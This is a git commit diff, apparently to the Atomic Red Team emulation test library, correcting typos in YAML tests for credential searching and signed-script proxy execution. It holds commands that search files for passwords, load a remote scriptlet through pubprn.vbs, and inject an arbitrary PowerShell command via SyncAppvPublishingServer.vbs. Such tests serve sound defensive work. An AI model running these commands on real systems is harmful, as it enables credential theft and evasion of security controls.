Fixed typo 1216 1081 (#830)

* Typo Test 3

findstr /si pass *.xml | *.doc | *.txt | *.xls -> findstr /si pass *.xml *.doc *.txt *.xls

* Typo Test 2

SyncAppvPublishingServe -> SyncAppvPublishingServer
Quotes in test 2 of a format not recognizable by Powershell when passed. Changed to regular quotes.
This commit is contained in:
Brian Thacker
2020-02-11 15:36:21 -06:00
committed by GitHub
parent 7ce029b52b
commit dd4783b2a5
2 changed files with 4 additions and 4 deletions
+1 -1
View File
@@ -40,7 +40,7 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
- name: Access unattend.xml
+3 -3
View File
@@ -22,9 +22,9 @@ atomic_tests:
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: |
Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
supported_platforms:
- windows
@@ -39,7 +39,7 @@ atomic_tests:
name: command_prompt
elevation_required: false
command: |
C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
- name: manage-bde.wsf Signed Script Command Execution
description: |